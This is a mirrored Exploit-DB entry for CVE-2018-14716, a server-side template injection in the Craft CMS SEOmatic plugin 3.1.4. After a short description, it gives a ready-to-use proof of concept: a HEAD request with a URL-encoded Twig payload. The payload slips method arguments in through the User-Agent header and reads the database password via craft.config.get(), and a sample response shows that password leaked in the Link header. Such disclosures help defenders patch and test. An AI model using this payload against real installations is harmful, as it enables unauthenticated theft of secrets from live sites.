Craft CMS SEOmatic plugin 3.1.4 – Server-Side Template Injection

• Exploit Database
• 37 阅读

• 作者： 0xB455
  日期： 2018-07-31
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/45108/

• # Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
  # Date: 2018-07-20
  # Software Link: https://github.com/nystudio107/craft-seomatic
  # Exploit Author: Sebastian Kriesten (0xB455)
  # Contact: https://twitter.com/0xB455
  # CVE: CVE-2018-14716
  # Category: webapps
  
  # 1. Description
  # An unauthenticated user can trigger the Twig template engine by injecting 
  # code into the URI as described in this article:
  
  # http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic/
  # This can be leveraged to perform arbitrary calls against the template engine and the CMS.
  # The output will be reflected within the Link header of the response.
  
  # 2. Proof of Concept
  # The injection can be performed against any part of the URL path. However as the framework is replacing 
  # control characters with HTML entities (e.g. ' ==> ') it is not possible to directly address methods with
  # parameter values. Therefor it is required to bypass the filter by invoking functions such as craft.request.getUserAgent()
  # and store the parameter values in the User-Agent header. In combination with Twig's slice() filter it is then possible
  # to extract sensitive information by utilizing the craft.config.get() method:
  
  # Request:
  HEAD /db-password:%20%7b%25%20set%20dummy%20=%20craft.request.getUserAgent()|slice(0,8)%25%7d%7b%25%20set%20dummy2%20=%20craft.request.getUserAgent()|slice(9,2)%25%7d%7b%7bcraft.config.get(dummy,dummy2)%7d%7d HTTP/1.1
  Host: craft-installation
  User-Agent: password db
  
  # Response:
  HTTP/1.1 404 Not Found
  Server: nginx
  …
  
  Link: <db-password: SECRET>; rel='canonical'
  …